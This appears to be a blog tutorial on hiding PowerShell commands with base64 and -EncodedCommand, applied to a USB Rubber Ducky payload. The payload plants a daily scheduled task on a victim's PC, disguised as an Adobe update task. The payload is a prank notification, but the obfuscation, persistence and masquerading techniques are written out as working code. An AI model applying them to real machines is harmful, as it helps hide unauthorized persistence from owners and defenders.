Obfuscating PowerShell Commands
I recently wrote a Ducky Script that creates a scheduled task upon plugging a Rubber Ducky into an unlocked PC. While the script is successful, I find it gives away too many clues as to what the script is doing.
PowerShell commands can be obfuscated using base64. These commands can be submitted to PowerShell using the the EncodedCommands parameter. While designed to be used to submit commands to PowerShell that require complex quotation marks or curly braces, it can also be used in an attempt to hide what commands a script is running.
The PowerShell commands my Ducky Script runs are as follows:
$action = New-ScheduledTaskAction -Execute 'wlrmdr.exe' -Argument " -s 60000 -f 1 -t You've Been Pwned! -m Remember that USB you plugged in? Pepperidge Farm Remembers. -a o" $trigger = New-ScheduledTaskTrigger -Daily -At 3:14pm Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "Adobe Acrobat Update Tusk" -Description "This task doesn't keep your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes"
This is a benign script that will remind the victim daily that they plugged in an unknown USB stick. I also had the scheduled task kind of hide itself as the Adobe Reader Update Task in an attempt to avoid being discovered later on.
Before getting started, PowerShell will need to know that it is to run all these commands together. This can be done using a semicolin (;). Simply put a semicolon between each command like so:
$action = New-ScheduledTaskAction -Execute 'wlrmdr.exe' -Argument " -s 60000 -f 1 -t You've Been Pwned! -m Remember that USB you plugged in? Pepperidge Farm Remembers. -a o";$trigger = New-ScheduledTaskTrigger -Daily -At 3:14pm;Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "Adobe Acrobat Update Tusk" -Description "This task doesn't keep your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes"
To convert the commands to base64, add the commands to a variable with a name of your choice. It my case I’ve gone with $EncodeText. It will also be important to use the backtick on the variables and some of the quotations.
$EncodeText = "`$action = New-ScheduledTaskAction -Execute 'wlrmdr.exe' -Argument `" -s 60000 -f 1 -t You've Been Pwned! -m Remember that USB you plugged in? Pepperidge Farm Remembers. -a o`";`$trigger = New-ScheduledTaskTrigger -Daily -At 3:14pm;Register-ScheduledTask -Action `$action -Trigger `$trigger -TaskName `"Adobe Acrobat Update Tusk`" -Description `"This task doesn't keep your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes`""
The commands can now be encoded in base64 by running the following command:
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($EncodeText))
The base64 text will be displayed on the screen.
JABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHcAbAByAG0AZAByAC4AZQB4AGUAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAIgAgAC0AcwAgADYAMAAwADAAMAAgAC0AZgAgADEAIAAtAHQAIABZAG8AdQAnAHYAZQAgAEIAZQBlAG4AIABQAHcAbgBlAGQAIQAgAC0AbQAgAFIAZQBtAGUAbQBiAGUAcgAgAHQAaABhAHQAIABVAFMAQgAgAHkAbwB1ACAAcABsAHUAZwBnAGUAZAAgAGkAbgA/ACAAUABlAHAAcABlAHIAaQBkAGcAZQAgAEYAYQByAG0AIABSAGUAbQBlAG0AYgBlAHIAcwAuACAALQBhACAAbwAiADsAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBEAGEAaQBsAHkAIAAtAEEAdAAgADMAOgAxADQAcABtADsAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAkAGEAYwB0AGkAbwBuACAALQBUAHIAaQBnAGcAZQByACAAJAB0AHIAaQBnAGcAZQByACAALQBUAGEAcwBrAE4AYQBtAGUAIAAiAEEAZABvAGIAZQAgAEEAYwByAG8AYgBhAHQAIABVAHAAZABhAHQAZQAgAFQAdQBzAGsAIgAgAC0ARABlAHMAYwByAGkAcAB0AGkAbwBuACAAIgBUAGgAaQBzACAAdABhAHMAawAgAGQAbwBlAHMAbgAnAHQAIABrAGUAZQBwACAAeQBvAHUAcgAgAEEAZABvAGIAZQAgAFIAZQBhAGQAZQByACAAYQBuAGQAIABBAGMAcgBvAGIAYQB0ACAAYQBwAHAAbABpAGMAYQB0AGkAbwBuAHMAIAB1AHAAIAB0AG8AIABkAGEAdABlACAAdwBpAHQAaAAgAHQAaABlACAAbABhAHQAZQBzAHQAIABlAG4AaABhAG4AYwBlAG0AZQBuAHQAcwAgAGEAbgBkACAAcwBlAGMAdQByAGkAdAB5ACAAZgBpAHgAZQBzACIA
This can now be fed into PowerShell using the EncodedCommand parameter. You can pipe the command to Out-Null to have the command run without any output:
PowerShell -EncodedCommand JABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHcAbAByAG0AZAByAC4AZQB4AGUAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAIgAgAC0AcwAgADYAMAAwADAAMAAgAC0AZgAgADEAIAAtAHQAIABZAG8AdQAnAHYAZQAgAEIAZQBlAG4AIABQAHcAbgBlAGQAIQAgAC0AbQAgAFIAZQBtAGUAbQBiAGUAcgAgAHQAaABhAHQAIABVAFMAQgAgAHkAbwB1ACAAcABsAHUAZwBnAGUAZAAgAGkAbgA/ACAAUABlAHAAcABlAHIAaQBkAGcAZQAgAEYAYQByAG0AIABSAGUAbQBlAG0AYgBlAHIAcwAuACAALQBhACAAbwAiADsAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBEAGEAaQBsAHkAIAAtAEEAdAAgADMAOgAxADQAcABtADsAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAkAGEAYwB0AGkAbwBuACAALQBUAHIAaQBnAGcAZQByACAAJAB0AHIAaQBnAGcAZQByACAALQBUAGEAcwBrAE4AYQBtAGUAIAAiAEEAZABvAGIAZQAgAEEAYwByAG8AYgBhAHQAIABVAHAAZABhAHQAZQAgAFQAdQBzAGsAIgAgAC0ARABlAHMAYwByAGkAcAB0AGkAbwBuACAAIgBUAGgAaQBzACAAdABhAHMAawAgAGQAbwBlAHMAbgAnAHQAIABrAGUAZQBwACAAeQBvAHUAcgAgAEEAZABvAGIAZQAgAFIAZQBhAGQAZQByACAAYQBuAGQAIABBAGMAcgBvAGIAYQB0ACAAYQBwAHAAbABpAGMAYQB0AGkAbwBuAHMAIAB1AHAAIAB0AG8AIABkAGEAdABlACAAdwBpAHQAaAAgAHQAaABlACAAbABhAHQAZQBzAHQAIABlAG4AaABhAG4AYwBlAG0AZQBuAHQAcwAgAGEAbgBkACAAcwBlAGMAdQByAGkAdAB5ACAAZgBpAHgAZQBzACIA | Out-Null
You can now run Obfuscated PowerShell Commands the way your inner PowerShell Ninja intended.
Check out the Ducky Script on GitHub!